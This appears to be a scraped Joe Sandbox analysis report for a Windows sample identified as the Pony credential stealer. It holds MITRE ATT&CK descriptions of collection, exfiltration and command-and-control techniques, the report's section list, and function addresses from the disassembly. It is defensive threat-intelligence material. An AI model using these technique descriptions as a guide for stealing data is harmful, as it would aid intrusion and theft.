Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pbfe2Xcxue.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Pony

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
pbfe2Xcxue.exe

Function 0040EE6F Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D67C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00405108 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 0040487D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Function 00405C62 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Function 004020F7 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Function 004036C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 156
networkstringCOMMON

Function 00402C53 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85
COMMON

Function 0040695B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Function 0040D330 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Function 00407E82 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Function 0040DF20 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Function 004081D4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Function 0040272A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Function 004052E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre